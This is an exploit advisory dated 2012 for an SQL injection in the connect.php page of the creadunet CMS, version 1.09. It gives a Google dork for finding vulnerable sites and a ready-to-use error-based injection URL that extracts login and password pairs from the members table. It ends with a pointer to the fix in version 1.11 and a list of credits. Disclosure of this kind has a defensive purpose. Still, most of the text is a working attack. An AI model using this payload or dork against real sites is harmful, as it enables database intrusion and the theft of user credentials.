---------------------------------------------------
# Exploit Title: creadunet <= 1.09 SQL injection vulnerability
# Date: 25/08/2012
# Exploit Author: Kallimero
# Vendor Homepage: http://www.creadunet.com/
# Version: 1.09 (earlier version may be also vulnerables)
# Tested on: Debian
# Dork : intext:"propulsé by creadunet 1.09"
Creadunet is a PTC-PTP cms.
It suffers from a remote SQL injection in the connect.php page.
I don't get the code, so I can't give more explanations.
PoC (error based) :
http://[site]/connect.php?activ=1&newid=1%20or%201%20group%20by%20concat%28%28select%20concat%28login,%200x3a,%20password,0x7e%29%20from%2011_membres_tbl%20limit%200,1%29,floor%28rand%280%29*2%29%29%20having%20min%280%29%20or%201--%20-
Fix
=========
Update to 1.11 version
http://www.creadunet.com/forum/viewtopic.php?f=46&t=3074
Thanks
=========
All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit : http://orgasm.re/
Groucho